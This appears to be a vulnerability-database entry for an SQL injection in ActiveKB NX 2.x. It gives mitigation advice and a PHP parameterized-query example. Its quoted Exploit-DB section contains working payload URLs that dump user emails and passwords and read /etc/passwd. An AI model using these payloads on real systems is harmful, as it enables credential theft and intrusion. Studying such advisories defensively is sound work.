vendor: ActiveKB
by: Luna-Tic and XTErner
N/A
CVSS
HIGH
SQL Injection
CWE
Product Name: ActiveKB
Affected Version From: ActiveKB NX 2.?
Affected Version To: ActiveKB NX 2.?
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

ActiveKB NX 2.? ( Powered by ActiveKB Knowledgebase Software) (index.php) SQL Injection

The ActiveKB NX 2.? software, powered by ActiveKB Knowledgebase Software, is vulnerable to SQL Injection attacks. This allows an attacker to execute arbitrary SQL commands through the 'catId' parameter in the 'index.php' file. By exploiting this vulnerability, an attacker can bypass authentication, access sensitive information, modify the database, or perform other malicious activities.

Mitigation:

To mitigate this vulnerability, it is recommended to update the ActiveKB software to the latest version or apply a patch provided by the vendor. Additionally, input validation and parameterized queries should be implemented to prevent SQL Injection attacks.
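The input validation and parameterized query recommended above, sketched for the `catId` parameter as an added example. It is not ActiveKB's code: the `articles` table, its columns and the function names are hypothetical, and it assumes PHP 8 with the PDO SQLite driver so it can run against an in-memory database.

```php
<?php
declare(strict_types=1);

// Demo database. The table and column names are hypothetical; the real
// ActiveKB schema is not shown on this page.
function make_demo_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE articles (id INTEGER PRIMARY KEY, cat_id INTEGER, title TEXT)');
    $pdo->exec("INSERT INTO articles (cat_id, title) VALUES (20, 'Resetting a password'), (21, 'Billing FAQ')");
    return $pdo;
}

// Input validation: catId must be a positive integer and nothing else.
// Returns null for strings with trailing SQL, arrays, empty or missing values.
function parse_cat_id(mixed $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Parameterized query: the value is bound as an integer and never
// concatenated into the SQL text. Returns null when the input is rejected.
function browse_category(PDO $pdo, mixed $rawCatId): ?array
{
    $catId = parse_cat_id($rawCatId);
    if ($catId === null) {
        return null; // caller should answer HTTP 400 without querying
    }
    $stmt = $pdo->prepare('SELECT id, title FROM articles WHERE cat_id = :cat ORDER BY id');
    $stmt->bindValue(':cat', $catId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$pdo = make_demo_db();
// Constructed inputs: a well-formed id, and a value with SQL appended to it.
foreach (['20', '20 union select 1'] as $input) {
    $rows = browse_category($pdo, $input);
    echo $input, ' => ', $rows === null ? 'rejected (400)' : count($rows) . ' row(s)', PHP_EOL;
}
```

In the real handler the value would come from `$_GET['catId']`; either control alone stops the reported injection, and using both keeps the query safe if the validation is later relaxed.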
Source

Exploit-DB raw data:

 ActiveKB NX 2.? ( Powered by ActiveKB Knowledgebase Software)  (index.php) SQL Injection

                              Discovered by Luna-Tic and XTErner 19 Years Ukrainian Hackers 

Vendor:www.interspire.com/activekb/

License: shareware

Exploit:/kb/index.php?ToDo=browse&catId=[SQL CODE]
http://www.xxx.net/kb/index.html?ToDo=browse&catId=-20+union+select+1,concat(email,0x3a,password,0x3a,userid),3,4,5,6,7+from+user--
https://www.xxx.com/faq/index.php?ToDo=browse&catId=-10+union+select+1,LOAD_FILE(0x2f6574632f706173737764),3,4,5,6,7+members/*

# milw0rm.com [2007-09-26]